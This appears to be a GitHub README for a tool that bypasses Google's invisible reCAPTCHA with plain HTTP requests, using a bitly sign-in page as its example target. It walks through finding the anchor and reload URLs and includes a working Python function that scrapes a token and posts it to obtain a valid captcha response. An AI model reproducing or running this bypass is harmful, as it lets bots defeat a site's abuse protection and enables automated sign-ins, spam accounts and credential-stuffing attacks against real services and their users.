Allows to bypass an invisible recaptcha just with HTTP requests, without Selenium or OCR.
1 - This bypass does not work on all invisible recaptchas, you have to try it to know if it works on your recaptcha;
2 - This bypass only works on invisible recaptchas.
3 - You must have some knowledge of HTTP requests to understand
TARGET : https://bitly.com/a/sign_in
Inspect network to find the recaptcha anchor url.
Inspect network to find the recaptcha reload url.
Let's now look at the payload of the reload request
1 - Find CHR [xx, xx, xx] (2023 : no longer required, you can leave it blank in the script)
2 - Find VH (The number sequence after the character *) (2023 : no longer required, you can leave it blank in the script)
3 - Find BG (Not me :D, the other BG inside the payload from the character ! to the character *) (2023 : no longer required, you can leave it blank in the script)
Starts here
Ends here
Run bypass.py with python3 and fill inputs.
Recaptcha is vulnerable :D we can generate the recaptcha response with HTTP requests !
Go in the bypassed.txt file, take the variables and you can now create your script to generate the recaptcha response.
import requests
def generateresponse(anchorurl, reloadurl, payload):
s = requests.Session()
r1 = s.get(anchorurl).text
token1 = r1.split('recaptcha-token" value="')[1].split('">')[0]
payload = payload.replace("<token>", str(token1))
r2 = s.post(reloadurl, data=payload, headers={"Content-Type": "application/x-www-form-urlencoded"})
try:
token2 = str(r2.text.split('"rresp","')[1].split('"')[0])
return token2
except:
return ""
2023 update : You can just send the token retrieved using the GET request to the anchor url and it will still work.
Pull requests are welcome. For major changes, please open an issue first to discuss what you would like to change.
Please make sure to update tests as appropriate.
blank <3